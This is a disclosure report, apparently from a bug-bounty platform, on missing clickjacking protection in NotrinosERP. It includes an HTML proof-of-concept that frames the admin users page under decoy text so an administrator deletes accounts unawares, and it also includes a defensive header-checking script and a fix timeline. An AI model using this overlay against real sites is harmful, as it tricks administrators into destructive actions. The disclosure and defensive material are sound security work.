Clickjacking Leads To User Deletion in notrinos/notrinoserp

Valid

Reported on Aug 21st 2022


  1. Hello team, on notrinoserp there is no clickjacking protection implemented (no X-Frame-Options header), so an attacker can perform a clickjacking attack; in this case I'm able to delete a user account via this vulnerability from the admin account. Here is the PoC:

Exploit Script:

```html
<style>
    /* the framed admin page is laid over the decoy text, semi-transparent here so the overlap is visible */
    iframe {
        position: relative;
        width: 1200px;
        height: 650px;
        opacity: 0.4;
        z-index: 2;
    }
    /* decoy text positioned under the delete control of the framed page */
    div {
        position: absolute;
        top: 183px;
        left: 880px;
        z-index: 1;
    }
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>
```

Patch Recommendation:

  1. Add an X-Frame-Options header to prevent clickjacking/UI redressing attacks

# Impact

1. An attacker can delete user accounts by exploiting this vulnerability, by misleading the admin.
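As an added example (not from the report or the NotrinosERP project), a check for whether a response's headers actually defeat framing. It covers the X-Frame-Options header recommended above and the CSP frame-ancestors directive, which browsers that support CSP evaluate in preference to X-Frame-Options; the sample header sets are constructed, not captured from the application.

```python
"""Evaluate an HTTP response's headers for effective clickjacking protection."""
from typing import Mapping, Tuple


def frame_protection(headers: Mapping[str, str]) -> Tuple[bool, str]:
    """Return (protected, reason) for a single response's headers.

    Header names are matched case-insensitively. A CSP frame-ancestors
    directive, when present, decides the outcome; otherwise X-Frame-Options
    is consulted. Values browsers ignore (ALLOW-FROM, comma-joined or
    misspelled tokens) count as unprotected, since the page can still be framed.
    """
    h = {name.lower(): value for name, value in headers.items()}

    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if sources in ([], ["none"]):  # empty source list matches nothing, like 'none'
                return True, "CSP frame-ancestors 'none'"
            if "*" in sources:
                return False, "CSP frame-ancestors allows any origin (*)"
            return True, "CSP frame-ancestors restricts to: " + " ".join(sources)

    xfo = h.get("x-frame-options")
    if xfo is None:
        return False, "no X-Frame-Options or CSP frame-ancestors header"
    value = xfo.strip().upper()
    if value in ("DENY", "SAMEORIGIN"):
        return True, f"X-Frame-Options {value}"
    if value.startswith("ALLOW-FROM"):
        return False, "X-Frame-Options ALLOW-FROM is obsolete and ignored by current browsers"
    return False, f"invalid X-Frame-Options value {xfo!r} (ignored by browsers)"


# Constructed sample header sets: the unprotected state the report describes,
# and a hardened response that sends both mechanisms.
UNPROTECTED = {"Content-Type": "text/html; charset=UTF-8"}
HARDENED = {
    "Content-Type": "text/html; charset=UTF-8",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}

if __name__ == "__main__":
    for label, hdrs in (("before fix", UNPROTECTED), ("after fix", HARDENED)):
        print(label, frame_protection(hdrs))
```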
We are processing your report and will contact the notrinos/notrinoserp team within 24 hours. a month ago
We have contacted a member of the notrinos/notrinoserp team and are waiting to hear back a month ago
Phương gave praise a month ago
Thanks @akshayravic09yc47 for detecting this vulnerability, it will be fixed soon.
Phương assigned a CVE to this report a month ago
Phương validated this vulnerability a month ago
Akshay Ravi has been awarded the disclosure bounty
Phương confirmed that a fix has been merged on c2ff3d a month ago
Phương has been awarded the fix bounty